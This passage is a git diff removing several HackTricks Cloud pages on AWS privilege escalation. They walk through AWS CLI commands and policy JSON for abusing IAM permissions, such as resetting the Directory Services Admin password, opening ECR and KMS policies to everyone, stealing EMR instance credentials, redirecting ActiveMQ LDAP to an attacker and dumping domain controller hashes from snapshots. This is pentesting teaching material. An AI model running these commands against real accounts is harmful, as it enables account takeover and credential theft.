-{% endhint %} - -## Directory Services - -For more info about directory services check: - -{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %} -[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md) -{% endcontent-ref %} - -### `ds:ResetUserPassword` - -This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ -By default, the only existent user is **Admin**. - -``` -aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. -``` - -### AWS Management Console - -It's possible to enable an **application access URL** that users from AD can access to login: - -
- -And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: - -
- -There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md deleted file mode 100644 index 3fedf519a..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md +++ /dev/null @@ -1,49 +0,0 @@ -# AWS - DynamoDB Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## dynamodb - -For more info about dynamodb check: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: - -{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %} -[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md) -{% endcontent-ref %} - -### TODO: Read data abusing data Streams - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md deleted file mode 100644 index 29cc69d95..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - EBS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EBS - -### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots` - -An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in: - -{% content-ref url="../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md" %} -[aws-ebs-snapshot-dump.md](../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) -{% endcontent-ref %} - -Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` - -The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**. - -**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords). - -### **`ec2:CreateSnapshot`** - -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. - -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md deleted file mode 100644 index 9a84a0d29..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md +++ /dev/null @@ -1,136 +0,0 @@ -# AWS - ECR Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECR - -### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` - -An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. - -For more info on how to download images: - -{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} -[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) -{% endcontent-ref %} - -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. - -### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` - -An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. - -To learn how to upload a new image/update one, check: - -{% content-ref url="../aws-services/aws-eks-enum.md" %} -[aws-eks-enum.md](../aws-services/aws-eks-enum.md) -{% endcontent-ref %} - -### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` - -Like the previous section, but for public repositories. - -### `ecr:SetRepositoryPolicy` - -An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ -For example, in this example read access is given to everyone. 
- -```bash -aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json -``` - -Contents of `my-policy.json`: - -```json -{ - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] -} -``` - -### `ecr-public:SetRepositoryPolicy` - -Like the previoous section, but for public repositories.\ -An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. - -{% code overflow="wrap" %} -```bash -bashCopy code# Create a JSON file with the malicious public repository policy -echo '{ - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "MaliciousPublicRepoPolicy", - "Effect": "Allow", - "Principal": "*", - "Action": [ - "ecr-public:GetDownloadUrlForLayer", - "ecr-public:BatchGetImage", - "ecr-public:BatchCheckLayerAvailability", - "ecr-public:PutImage", - "ecr-public:InitiateLayerUpload", - "ecr-public:UploadLayerPart", - "ecr-public:CompleteLayerUpload", - "ecr-public:DeleteRepositoryPolicy" - ] - } - ] -}' > malicious_public_repo_policy.json - -# Apply the malicious public repository policy to the ECR Public repository -aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json -``` -{% endcode %} - -**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images. - -### `ecr:PutRegistryPolicy` - -An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**. 
- -```bash -aws ecr set-repository-policy \ - --repository-name \ - --policy-text file://my-policy.json -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md deleted file mode 100644 index acad83823..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md +++ /dev/null @@ -1,92 +0,0 @@ -# AWS - EMR Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EMR - -More **info about EMR** in: - -{% content-ref url="../aws-services/aws-emr-enum.md" %} -[aws-emr-enum.md](../aws-services/aws-emr-enum.md) -{% endcontent-ref %} - -### `iam:PassRole`, `elasticmapreduce:RunJobFlow` - -An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ -Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). - -```bash -# Import EC2 ssh key (you will need extra permissions for this) -ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" -chmod 400 /tmp/sshkey -base64 /tmp/sshkey.pub > /tmp/pub.key -aws ec2 import-key-pair \ - --key-name "privesc" \ - --public-key-material file:///tmp/pub.key - - -aws emr create-cluster \ - --release-label emr-5.15.0 \ - --instance-type m4.large \ - --instance-count 1 \ - --service-role EMR_DefaultRole \ - --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc - -# Wait 1min and connect via ssh to an EC2 instance of the cluster) -aws emr describe-cluster --cluster-id -# In MasterPublicDnsName you can find the DNS to connect to the master instance -## You cna also get this info listing EC2 instances -``` - -Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. - -**Potential Impact:** Privesc to the EC2 service role specified. 
- -### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` - -With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. - -{% hint style="danger" %} -Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. -{% endhint %} - -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile - -### `elasticmapreduce:OpenEditorInConsole` - -Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ -The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` - -{% hint style="danger" %} -Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related`.` -{% endhint %} - -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md deleted file mode 100644 index 77979f805..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - Gamelift - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### `gamelift:RequestUploadCredentials` - -With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. - -```bash -aws gamelift request-upload-credentials \ - --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 -``` - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md deleted file mode 100644 index ccd34ffa8..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md +++ /dev/null @@ -1,154 +0,0 @@ -# AWS - KMS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For more info about KMS check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) - -With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: - -{% code overflow="wrap" %} -```bash -aws kms list-keys -aws kms list-key-policies --key-id # Although only 1 max per key -aws kms get-key-policy --key-id --policy-name -# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") -aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json -``` -{% endcode %} - -policy.json: - -```json -{ - "Version" : "2012-10-17", - "Id" : "key-consolepolicy-3", - "Statement" : [ - { - "Sid" : "Enable IAM User Permissions", - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : "kms:*", - "Resource" : "*" - }, - { - "Sid" : "Allow all use", - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : [ "kms:*" ], - "Resource" : "*" - } - ] -} -``` - -### `kms:CreateGrant` - -It **allows a principal to use a KMS key:** - -```bash -aws kms create-grant \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ - --operations Decrypt -``` - -{% hint style="warning" %} -A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) -{% endhint %} - -{% hint style="warning" %} -Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. 
Once that time has passed, the principal can use the KMS key without needing to specify anything.\ -However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ -For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). -{% endhint %} - -```bash -# Use the grant token in a request -aws kms generate-data-key \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - –-key-spec AES_256 \ - --grant-tokens $token -``` - -Note that it's possible to list grant of keys with: - -```bash -aws kms list-grants --key-id -``` - -### `kms:CreateKey`, `kms:ReplicateKey` - -With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. - -So, an attacker could abuse this to obtain privesc his access to the key and use it - -{% code overflow="wrap" %} -```bash -aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml - -{ - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "kms:*", - "Resource": "*" - } - ] -} -``` -{% endcode %} - -### `kms:Decrypt` - -This permission allows to use a key to decrypt some information.\ -For more information check: - -{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md deleted file mode 100644 index 3156ba72e..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - Mediapackage Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### `mediapackage:RotateChannelCredentials` - -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - -```bash -aws mediapackage rotate-channel-credentials --id -``` - -### `mediapackage:RotateIngestEndpointCredentials` - -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - -{% code overflow="wrap" %} -```bash -aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 -``` -{% endcode %} - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md deleted file mode 100644 index 3532b180a..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md +++ /dev/null @@ -1,79 +0,0 @@ -# AWS - MQ Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## MQ - -For more information about MQ check: - -{% content-ref url="../aws-services/aws-mq-enum.md" %} -[aws-mq-enum.md](../aws-services/aws-mq-enum.md) -{% endcontent-ref %} - -### `mq:ListBrokers`, `mq:CreateUser` - -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - -{% code overflow="wrap" %} -```bash -aws mq list-brokers -aws mq create-user --broker-id --console-access --password --username -``` -{% endcode %} - -**Potential Impact:** Access sensitive info navigating through ActiveMQ - -### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` - -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - -{% code overflow="wrap" %} -```bash -aws mq list-brokers -aws mq list-users --broker-id -aws mq update-user --broker-id --console-access --password --username -``` -{% endcode %} - -**Potential Impact:** Access sensitive info navigating through ActiveMQ - -### `mq:ListBrokers`, `mq:UpdateBroker` - -If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. - -```bash -aws mq list-brokers -aws mq update-broker --broker-id --ldap-server-metadata=... -``` - -If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). - -**Potential Impact:** Steal ActiveMQ credentials - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
